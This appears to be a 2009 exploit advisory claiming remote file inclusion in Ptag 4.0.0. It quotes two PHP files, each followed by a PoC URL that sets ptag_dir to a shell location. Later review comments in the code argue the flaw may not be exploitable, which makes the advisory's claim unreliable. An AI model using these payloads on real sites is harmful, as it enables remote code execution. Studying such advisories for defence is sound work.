Ptag 4.0.0 Remote File Inclusion

2009-12-21T00:00:00
ID PACKETSTORM:84079
Type packetstorm
Reporter cr4wl3r
Modified 2009-12-21T00:00:00

Description

                                        
                                            `##################################################################  
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ##  
## Date: 19-12-2009 ##  
## Author: cr4wl3r ##  
## Software Link: http://sourceforge.net/projects/ptag/ ##  
## Version: N/A ##  
## Tested on: GNU/LINUX ##  
##################################################################  
  
  
~ Code [session.php]  
  
<?php  
//Plottable Tagboard Systems Version 4.0.0 - ROLAND  
//Session handling File  
  
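// Review note: `ptag_dir` is written without a `$`, so it is a constant, not a
// variable. Request parameters populate $_GET/$_REQUEST (and, with
// register_globals enabled, global variables); they never define constants.
// The include path below is therefore only influenced by a request if code
// that is not shown on this page defines ptag_dir from request data.
// Confirm where ptag_dir is defined before treating this line as a
// file-inclusion sink.
//
// Hardening: stop when the file is requested directly (constant not defined)
// rather than letting require_once fail with an error that may disclose
// filesystem paths when display_errors is on.
if (!defined('ptag_dir')) {
    exit;
}

require_once(ptag_dir."lib/php/crossSession.php");

/**
 * Ptag session handler, a thin specialisation of crossSession.
 *
 * Sets the table and cookie names used by the parent class and then
 * delegates all session work to crossSession (not shown on this page).
 */
class ptag_session extends crossSession{
    /**
     * Configure table/cookie names and initialise the parent session.
     *
     * Reads the global $ptag_sql handle and the constants ptag_prefix and
     * ptag_output, all of which must be set up by the including script.
     */
    public function __construct(){
        global $ptag_sql;

        // Table and cookie share the same prefixed name.
        $this -> sql_table = ptag_prefix."session";
        $this -> cookie_name = ptag_prefix."session";

        // In RSS mode the parent receives sha1("") as its second argument;
        // the original author describes this as switching to a "non-viewed
        // tracker". The meaning of that argument is defined by crossSession.
        if (ptag_output == "rss"){
            parent::__construct($ptag_sql, sha1(""));
        }
        else{
            parent::__construct($ptag_sql);
        }
    }
}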
?>  
  
~ PoC  
  
[Ptag_path]/lib/session.php?ptag_dir=[Shell]  
  
  
  
  
~ Code [sql.php]  
  
<?php  
//Plottable Tagboard Systems Version 4.0.0 - ROLAND  
//Extending MySQL class  
  
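// Review note: `ptag_dir` is written without a `$`, so it is a constant, not a
// variable. Request parameters populate $_GET/$_REQUEST (and, with
// register_globals enabled, global variables); they never define constants.
// The include path below is therefore only influenced by a request if code
// that is not shown on this page defines ptag_dir from request data.
// Confirm where ptag_dir is defined before treating this line as a
// file-inclusion sink.
//
// Hardening: stop when the file is requested directly (constant not defined)
// rather than letting require_once fail with an error that may disclose
// filesystem paths when display_errors is on.
if (!defined('ptag_dir')) {
    exit;
}

require_once(ptag_dir."lib/php/ezmySQL.php");

/**
 * Ptag database wrapper, a thin specialisation of ezmySQL.
 *
 * Supplies the connection settings from the ptag_mysql_* constants and
 * routes query errors to ptag_exception.
 */
class ptag_sql extends ezmySQL{

    /**
     * Initialise the parent with host, user, password and database name taken
     * from the ptag_mysql_host/user/pass/db constants.
     */
    public function __construct(){
        parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);
    }

    /**
     * Format a MySQL error and hand it to ptag_exception::handle_error().
     *
     * @param array $err Error details; the keys read here are errno, error,
     *                   query, line, file, class and method.
     * @return mixed Whatever ptag_exception::handle_error() returns.
     */
    protected function error_handler($err){
        // NOTE(review): the message embeds the full query text. If
        // handle_error() (not shown on this page) renders it to the client,
        // SQL and schema details are disclosed; prefer logging it server-side.
        $error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];

        return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);
    }
}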
?>  
  
  
~ PoC  
  
[Ptag_path]/lib/sql.php?ptag_dir=[Shell]  
  
`